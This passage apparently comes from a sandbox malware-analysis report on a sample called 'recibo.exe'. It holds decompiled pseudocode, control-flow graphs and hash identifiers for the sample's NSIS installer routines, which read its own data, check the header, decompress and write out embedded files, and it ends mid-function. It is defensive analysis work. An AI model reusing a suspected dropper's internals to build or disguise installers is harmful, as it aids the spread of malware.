                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                  • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                  • API String ID: 1975747703-3228750522
                                                                                  • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                  • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                                  • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                  • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040307D Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 378 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 395 403200-403203 387->395 396 403253-403258 387->396 390 403110-403127 388->390 391 403129 390->391 392 40312b-403134 call 4034cf 390->392 391->392 401 40325a-403262 call 403019 392->401 402 40313a-403141 392->402 398 403205-40321d call 4034e5 call 4034cf 395->398 399 403227-403251 GlobalAlloc call 4034e5 call 4032b4 395->399 396->380 398->396 421 40321f-403225 398->421 399->396 426 403264-403275 399->426 401->396 405 403143-403157 call 405fe8 402->405 406 4031bd-4031c1 402->406 411 4031cb-4031d1 405->411 424 403159-403160 405->424 410 4031c3-4031ca call 403019 406->410 406->411 410->411 417 4031e0-4031e8 411->417 418 4031d3-4031dd call 4069f7 411->418 417->390 425 4031ee 417->425 418->417 421->396 421->399 424->411 428 403162-403169 424->428 425->387 429 403277 426->429 430 40327d-403282 426->430 428->411 432 40316b-403172 428->432 429->430 431 403283-403289 430->431 431->431 433 40328b-4032a6 SetFilePointer call 405fe8 431->433 432->411 434 403174-40317b 432->434 437 4032ab 433->437 434->411 436 40317d-40319d 434->436 436->396 438 4031a3-4031a7 436->438 437->380 439 4031a9-4031ad 438->439 440 4031af-4031b7 438->440 439->425 439->440 440->411 441 4031b9-4031bb 440->441 441->411
                                                                                  C-Code - Quality: 80%
                                                                                  			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\recibo.exe";
				 *0x434f0c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\recibo.exe", 0x400);
				_t89 = E0040602D(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040653D(0x441800, _t91);
				E0040653D(0x444000, E00405E58(0x441800));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x42aa24 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					__eflags =  *0x434f14 - _t82;
					if( *0x434f14 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40387d
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034E5( *0x434f14 + 0x1c);
						_t35 =  &_v24; // 0x40387d
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x434f10 = _t94;
							 *0x434f18 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f1c =  *0x434f1c + 1;
								__eflags =  *0x434f1c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FE8(0x434f20, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004034E5( *0x41ea18);
					_t65 = E004034CF( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004034CF(0x416a18, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x434f14;
						if( *0x434f14 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FE8( &_v44, 0x416a18, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x41ea18; // 0x94236
						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x434f14 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x42aa24; // 0x9423a
						if(__eflags < 0) {
							_v12 = E004069F7(_v12, 0x416a18, _t90);
						}
						 *0x41ea18 =  *0x41ea18 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}































                                                                                  0x00403085
                                                                                  0x00403088
                                                                                  0x0040308b
                                                                                  0x0040308e
                                                                                  0x00403094
                                                                                  0x004030a5
                                                                                  0x004030aa
                                                                                  0x004030bd
                                                                                  0x004030c2
                                                                                  0x004030c5
                                                                                  0x004030cb
                                                                                  0x00000000
                                                                                  0x004030cd
                                                                                  0x004030de
                                                                                  0x004030ef
                                                                                  0x004030f6
                                                                                  0x004030fc
                                                                                  0x004030fe
                                                                                  0x00403103
                                                                                  0x00403105
                                                                                  0x004031f0
                                                                                  0x004031f2
                                                                                  0x004031f7
                                                                                  0x004031fe
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403200
                                                                                  0x00403203
                                                                                  0x00403227
                                                                                  0x00403227
                                                                                  0x0040322c
                                                                                  0x00403232
                                                                                  0x0040323d
                                                                                  0x00403242
                                                                                  0x00403242
                                                                                  0x00403245
                                                                                  0x00403246
                                                                                  0x00403247
                                                                                  0x00403249
                                                                                  0x0040324e
                                                                                  0x00403251
                                                                                  0x00403264
                                                                                  0x00403268
                                                                                  0x00403270
                                                                                  0x00403275
                                                                                  0x00403277
                                                                                  0x00403277
                                                                                  0x00403277
                                                                                  0x0040327f
                                                                                  0x0040327f
                                                                                  0x00403282
                                                                                  0x00403283
                                                                                  0x00403283
                                                                                  0x00403286
                                                                                  0x00403288
                                                                                  0x00403288
                                                                                  0x00403288
                                                                                  0x00403292
                                                                                  0x00403298
                                                                                  0x004032a6
                                                                                  0x004032ab
                                                                                  0x00000000
                                                                                  0x004032ab
                                                                                  0x00000000
                                                                                  0x00403251
                                                                                  0x0040320b
                                                                                  0x00403216
                                                                                  0x0040321b
                                                                                  0x0040321d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403222
                                                                                  0x00403225
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040310b
                                                                                  0x00403110
                                                                                  0x00403115
                                                                                  0x00403119
                                                                                  0x00403120
                                                                                  0x00403125
                                                                                  0x00403127
                                                                                  0x00403129
                                                                                  0x00403129
                                                                                  0x0040312d
                                                                                  0x00403132
                                                                                  0x00403134
                                                                                  0x0040325c
                                                                                  0x00403253
                                                                                  0x00000000
                                                                                  0x00403253
                                                                                  0x0040313a
                                                                                  0x00403141
                                                                                  0x004031bd
                                                                                  0x004031c1
                                                                                  0x004031c5
                                                                                  0x004031ca
                                                                                  0x00000000
                                                                                  0x004031c1
                                                                                  0x0040314a
                                                                                  0x0040314f
                                                                                  0x00403152
                                                                                  0x00403157
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403159
                                                                                  0x00403160
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403162
                                                                                  0x00403169
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040316b
                                                                                  0x00403172
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403174
                                                                                  0x0040317b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040317d
                                                                                  0x00403183
                                                                                  0x0040318c
                                                                                  0x00403192
                                                                                  0x00403195
                                                                                  0x00403197
                                                                                  0x0040319d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004031a3
                                                                                  0x004031a7
                                                                                  0x004031af
                                                                                  0x004031af
                                                                                  0x004031b2
                                                                                  0x004031b5
                                                                                  0x004031b7
                                                                                  0x004031b9
                                                                                  0x004031b9
                                                                                  0x00000000
                                                                                  0x004031b7
                                                                                  0x004031a9
                                                                                  0x004031ad
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004031cb
                                                                                  0x004031cb
                                                                                  0x004031d1
                                                                                  0x004031dd
                                                                                  0x004031dd
                                                                                  0x004031e0
                                                                                  0x004031e6
                                                                                  0x004031e6
                                                                                  0x004031e6
                                                                                  0x004031ee
                                                                                  0x004031ee
                                                                                  0x00000000
                                                                                  0x004031ee

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040308E
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\recibo.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                                    • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\recibo.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                    • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,C:\Users\user\Desktop\recibo.exe,C:\Users\user\Desktop\recibo.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                                  • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                  • String ID: 6B$:B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\recibo.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                                  • API String ID: 2803837635-1419559267
                                                                                  • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                  • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                                  • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                  • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004032B4 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 727 4032b4-4032cb 728 4032d4-4032dd 727->728 729 4032cd 727->729 730 4032e6-4032eb 728->730 731 4032df 728->731 729->728 732 4032fb-403308 call 4034cf 730->732 733 4032ed-4032f6 call 4034e5 730->733 731->730 737 4034bd 732->737 738 40330e-403312 732->738 733->732 739 4034bf-4034c0 737->739 740 403468-40346a 738->740 741 403318-403361 GetTickCount 738->741 744 4034c8-4034cc 739->744 742 4034aa-4034ad 740->742 743 40346c-40346f 740->743 745 4034c5 741->745 746 403367-40336f 741->746 747 4034b2-4034bb call 4034cf 742->747 748 4034af 742->748 743->745 749 403471 743->749 745->744 750 403371 746->750 751 403374-403382 call 4034cf 746->751 747->737 760 4034c2 747->760 748->747 754 403474-40347a 749->754 750->751 751->737 759 403388-403391 751->759 757 40347c 754->757 758 40347e-40348c call 4034cf 754->758 757->758 758->737 764 40348e-40349a call 4060df 758->764 763 403397-4033b7 call 406a65 759->763 760->745 769 403460-403462 763->769 770 4033bd-4033d0 GetTickCount 763->770 771 403464-403466 764->771 772 40349c-4034a6 764->772 769->739 773 4033d2-4033da 770->773 774 40341b-40341d 770->774 771->739 772->754 775 4034a8 772->775 776 4033e2-403413 MulDiv wsprintfW call 40559f 773->776 777 4033dc-4033e0 773->777 778 403454-403458 774->778 779 40341f-403423 774->779 775->745 785 403418 776->785 777->774 777->776 778->746 780 40345e 778->780 782 403425-40342c call 4060df 779->782 783 40343a-403445 779->783 780->745 787 403431-403433 782->787 784 403448-40344c 783->784 784->763 788 403452 784->788 785->774 787->771 789 403435-403438 787->789 788->745 789->784
                                                                                  C-Code - Quality: 95%
                                                                                  			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x422a20;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034E5( *0x434f58 + _t62);
				}
				if(E004034CF( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004034CF(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004034CF(0x41ea20, _t98) == 0) {
								goto L41;
							}
							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d384 =  *0x40d384 & 0x00000000;
					 *0x40d380 =  *0x40d380 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce68 = 8;
					 *0x416a10 = 0x40ea08;
					 *0x416a0c = 0x40ea08;
					 *0x416a08 = 0x416a08;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004034CF(0x41ea20, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce58 = 0x41ea20;
						 *0x40ce5c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce60 = _t95;
							 *0x40ce64 = _v12;
							_t75 = E00406A65(0x40ce58);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40ce60; // 0x4231b5
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040559F(0,  &_v152); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40ce60; // 0x4231b5
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E004060DF(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

























                                                                                  0x004032bf
                                                                                  0x004032c3
                                                                                  0x004032c6
                                                                                  0x004032cb
                                                                                  0x004032cd
                                                                                  0x004032cd
                                                                                  0x004032d4
                                                                                  0x004032d8
                                                                                  0x004032dd
                                                                                  0x004032df
                                                                                  0x004032df
                                                                                  0x004032e6
                                                                                  0x004032eb
                                                                                  0x004032f6
                                                                                  0x004032f6
                                                                                  0x00403308
                                                                                  0x004034bd
                                                                                  0x004034bd
                                                                                  0x00000000
                                                                                  0x0040330e
                                                                                  0x00403312
                                                                                  0x0040346a
                                                                                  0x004034ad
                                                                                  0x004034af
                                                                                  0x004034af
                                                                                  0x004034bb
                                                                                  0x004034c2
                                                                                  0x004034c5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004034bb
                                                                                  0x0040346f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403471
                                                                                  0x00403474
                                                                                  0x00403477
                                                                                  0x0040347a
                                                                                  0x0040347c
                                                                                  0x0040347c
                                                                                  0x0040348c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040349a
                                                                                  0x00403464
                                                                                  0x00403464
                                                                                  0x004034bf
                                                                                  0x004034bf
                                                                                  0x00000000
                                                                                  0x004034bf
                                                                                  0x0040349c
                                                                                  0x0040349f
                                                                                  0x004034a6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004034a8
                                                                                  0x00000000
                                                                                  0x00403474
                                                                                  0x0040331e
                                                                                  0x00403320
                                                                                  0x00403327
                                                                                  0x0040332e
                                                                                  0x0040332e
                                                                                  0x00403335
                                                                                  0x0040333d
                                                                                  0x00403347
                                                                                  0x0040334c
                                                                                  0x00403354
                                                                                  0x0040335e
                                                                                  0x00403361
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403367
                                                                                  0x00403367
                                                                                  0x00403367
                                                                                  0x0040336f
                                                                                  0x00403371
                                                                                  0x00403371
                                                                                  0x00403382
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403388
                                                                                  0x0040338b
                                                                                  0x00403391
                                                                                  0x00403397
                                                                                  0x00403397
                                                                                  0x004033a2
                                                                                  0x004033a8
                                                                                  0x004033ad
                                                                                  0x004033b4
                                                                                  0x004033b7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004033bd
                                                                                  0x004033c3
                                                                                  0x004033c5
                                                                                  0x004033ce
                                                                                  0x004033d0
                                                                                  0x00403401
                                                                                  0x00403407
                                                                                  0x00403413
                                                                                  0x00403418
                                                                                  0x00403418
                                                                                  0x0040341d
                                                                                  0x00403458
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040341f
                                                                                  0x00403423
                                                                                  0x0040343a
                                                                                  0x0040343f
                                                                                  0x00403442
                                                                                  0x00403445
                                                                                  0x00403448
                                                                                  0x0040344c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403452
                                                                                  0x0040342c
                                                                                  0x00403433
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403435
                                                                                  0x00000000
                                                                                  0x00403435
                                                                                  0x0040341d
                                                                                  0x00403460
                                                                                  0x00000000
                                                                                  0x00403460
                                                                                  0x00000000
                                                                                  0x00403367

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountTick$wsprintf
                                                                                  • String ID: *B$ A$ A$... %d%%$}8@
                                                                                  • API String ID: 551687249-3029848762
                                                                                  • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                  • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                                  • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                  • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 790 40176f-401794 call 402da6 call 405e83 795 401796-40179c call 40653d 790->795 796 40179e-4017b0 call 40653d call 405e0c lstrcatW 790->796 802 4017b5-4017b6 call 4067c4 795->802 796->802 805 4017bb-4017bf 802->805 806 4017c1-4017cb call 406873 805->806 807 4017f2-4017f5 805->807 815 4017dd-4017ef 806->815 816 4017cd-4017db CompareFileTime 806->816 809 4017f7-4017f8 call 406008 807->809 810 4017fd-401819 call 40602d 807->810 809->810 817 40181b-40181e 810->817 818 40188d-4018b6 call 40559f call 4032b4 810->818 815->807 816->815 819 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 817->819 820 40186f-401879 call 40559f 817->820 832 4018b8-4018bc 818->832 833 4018be-4018ca SetFileTime 818->833 819->805 854 401864-401865 819->854 830 401882-401888 820->830 834 402c33 830->834 832->833 836 4018d0-4018db CloseHandle 832->836 833->836 840 402c35-402c39 834->840 838 4018e1-4018e4 836->838 839 402c2a-402c2d 836->839 842 4018e6-4018f7 call 40657a lstrcatW 838->842 843 4018f9-4018fc call 40657a 838->843 839->834 848 401901-402398 842->848 843->848 852 40239d-4023a2 848->852 853 402398 call 405b9d 848->853 852->840 853->852 854->830 855 401867-401868 854->855 855->820
                                                                                  C-Code - Quality: 75%
                                                                                  			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E83( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
				} else {
					E0040653D();
				}
				E004067C4(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406873(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406008(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040559F(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
